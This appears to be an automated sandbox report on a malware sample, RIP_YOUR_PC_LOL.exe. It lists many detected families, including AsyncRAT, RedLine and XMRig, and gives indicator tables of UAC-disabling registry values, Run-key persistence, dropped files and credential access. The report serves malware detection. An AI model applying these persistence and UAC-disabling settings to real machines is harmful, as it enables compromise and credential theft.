Analysis Overview
SHA256
37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
Threat Level: Known bad
The file RIP_YOUR_PC_LOL.exe was found to be: Known bad.
Malicious Activity Summary
Dcrat family
Purplefox family
AsyncRat
Azorult
Fickerstealer family
NanoCore
Raccoon
njRAT/Bladabindi
Process spawned unexpected child process
Blackmoon family
Azorult family
Raccoon Stealer V1 payload
DcRat
Raccoon family
Redline family
Gh0strat family
Pony family
HawkEye
UAC bypass
Fickerstealer
PurpleFox
Detect Blackmoon payload
xmrig
Njrat family
Hawkeye family
Asyncrat family
Gh0strat
Pony,Fareit
Xmrig family
RedLine
Oski family
Gh0st RAT payload
Nanocore family
Oski
Blackmoon, KrBanker
Detect PurpleFox Rootkit
Detected Nirsoft tools
Async RAT payload
NirSoft WebBrowserPassView
NirSoft MailPassView
XMRig Miner payload
DCRat payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Modifies Windows Firewall
Drops file in Drivers directory
Sets service image path in registry
Downloads MZ/PE file
Server Software Component: Terminal Services DLL
Uses the VBS compiler for execution
Executes dropped EXE
Reads data files stored by FTP clients
Checks BIOS information in registry
Impair Defenses: Safe Mode Boot
Checks computer location settings
Loads dropped DLL
Drops startup file
Unexpected DNS network traffic destination
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Indicator Removal: File Deletion
Enumerates connected drives
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Checks whether UAC is enabled
Accesses Microsoft Outlook accounts
Checks installed software on the system
Adds Run key to start application
Checks system information in the registry
Suspicious use of SetThreadContext
UPX packed file
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
System Network Configuration Discovery: Internet Connection Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Program crash
Browser Information Discovery
Suspicious behavior: LoadsDriver
System policy modification
Modifies system certificate store
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
NTFS ADS
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
outlook_win_path
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Runs ping.exe
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-04 19:14
Signatures
Blackmoon family
Detect Blackmoon payload
Nanocore family
Njrat family
Detected Nirsoft tools
NirSoft MailPassView
NirSoft WebBrowserPassView
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-04 19:14
Reported
2024-12-04 19:16
Platform
win7-20240903-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
AsyncRat
Asyncrat family
Azorult
Azorult family
Blackmoon family
Blackmoon, KrBanker
DcRat
Dcrat family
Detect Blackmoon payload
Detect PurpleFox Rootkit
Fickerstealer
Fickerstealer family
Gh0st RAT payload
Gh0strat
Gh0strat family
HawkEye
Hawkeye family
NanoCore
Nanocore family
Njrat family
Oski
Oski family
Pony family
Pony,Fareit
PurpleFox
Purplefox family
Raccoon
Raccoon Stealer V1 payload
Raccoon family
RedLine
Redline family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
Xmrig family
njRAT/Bladabindi
xmrig
Async RAT payload
DCRat payload
Detected Nirsoft tools
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
NirSoft MailPassView
NirSoft WebBrowserPassView
XMRig Miner payload
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\QAssist.sys | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\259437400.txt" | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TXPlatforn = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\TXPlatforn.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Documents and Settings\\taskhost.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ISS Host = "C:\\Program Files (x86)\\ISS Host\\isshost.exe" | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Uninstall Information\\sppsvc.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\KBDVNTC\\lsass.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0fd7de5367376231a788872005d7ed4f = "\"C:\\Program Files\\Windows Portable Devices\\0fd7de5367376231a788872005d7ed4f.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a = "\"C:\\Users\\Admin\\AppData\\Roaming\\8f1c8b40c7be588389a8d382040b23bb\\a.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\ProgramData\\Start Menu\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\ProgramData\Start Menu\dllhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Start Menu\dllhost.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\259437400.txt | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\SysWOW64\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\ini.ini | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File created | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File created | C:\Windows\System32\KBDVNTC\lsass.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\System32\KBDVNTC\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9 | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\ISS Host\isshost.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Uninstall Information\sppsvc.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Uninstall Information\0a1fd5f707cd16ea89afd3d6db52b2da58214a6c | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files (x86)\ISS Host\isshost.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\81a075a9bdba30e81d300eb5cd970ab17cef3e5f | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Cursors\TrustedInsteller.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render_New.dll | C:\Windows\SysWOW64\svchost.exe | N/A |
| File created | C:\Windows\Help\Winlogon.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render.dll | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Cursors\WUDFhosts.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Cursors\KillProcc.sys | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Help\Winlogon.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Help\Winlogon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\HD____11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CC3CEE90-FC83-4AED-AF5B-78B42F7F7325}\aa-ca-f0-57-92-4a | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-ca-f0-57-92-4a\WpadDecisionReason = "1" | C:\Windows\SysWOW64\svchost.exe | N/A |
